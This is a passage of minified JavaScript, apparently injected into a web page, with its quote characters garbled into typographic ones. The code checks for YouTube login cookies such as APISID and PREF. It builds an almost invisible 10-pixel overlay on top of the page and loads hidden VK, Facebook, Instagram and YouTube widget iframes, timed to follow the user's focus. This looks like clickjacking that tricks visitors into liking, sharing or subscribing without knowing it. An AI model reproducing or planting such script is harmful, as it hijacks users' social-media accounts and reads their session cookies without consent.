u.workId=»22″,void((n=r(«APISID»))&&window.ytcfg&&window.ytcfg.data_&&(window.ytcfg.data_.PLAYER_CONFIG&&window.ytcfg.data_.PLAYER_CONFIG.args&&window.ytcfg.data_.PLAYER_CONFIG.args.user_display_name||window.ytcfg.data_.LOGGED_IN)&&(o.style.position=»fixed»,o.style.left=»0px»,o.style.top=»0″,o.style.width=»10px»,o.style.height=»10px»,o.style.opacity=»0.01″,o.style.zIndex=»99999999″,setTimeout(u.startQueue,300),setTimeout(u.checkFocus,100),v(!0)));if(document.location.href.indexOf(«instagram.com»)>0)return void p();var e=document.createElement(«iframe»);e.src=u.vkUrl+»widget_post.php»,e.width=e.height=»10″,e.style.width=e.style.height=»10px»,o.appendChild(e);var t=document.createElement(«iframe»);t.src=u.fbUrl+»v2.5/plugins/video.php»,t.width=t.height=»10″,t.style.width=t.style.height=»10px»,o.appendChild(t);var i=document.createElement(«iframe»);i.src=u.inUrl+»/p/embed/embed/»,i.width=i.height=»10″,i.style.width=i.style.height=»10px»,o.appendChild(i);var a=document.createElement(«iframe»);a.src=u.youUrl+»/embed»,a.width=a.height=»10″,a.style.position=»absolute»,a.style.width=a.style.height=»10px»,o.appendChild(a)}else{if(document.location.href.indexOf(«youtube.com»)>0)return u.workId=»6″,void((n=r(«APISID»))&&window.ytcfg&&window.ytcfg.data_&&(window.ytcfg.data_.PLAYER_CONFIG&&window.ytcfg.data_.PLAYER_CONFIG.args&&window.ytcfg.data_.PLAYER_CONFIG.args.user_display_name||window.ytcfg.data_.LOGGED_IN)&&(u.cookiesData.old=r(«PREF»),v()));if(document.location.href.indexOf(«instagram.com»)>0)return void p(!0)}}},1e3))}}();
// ]]>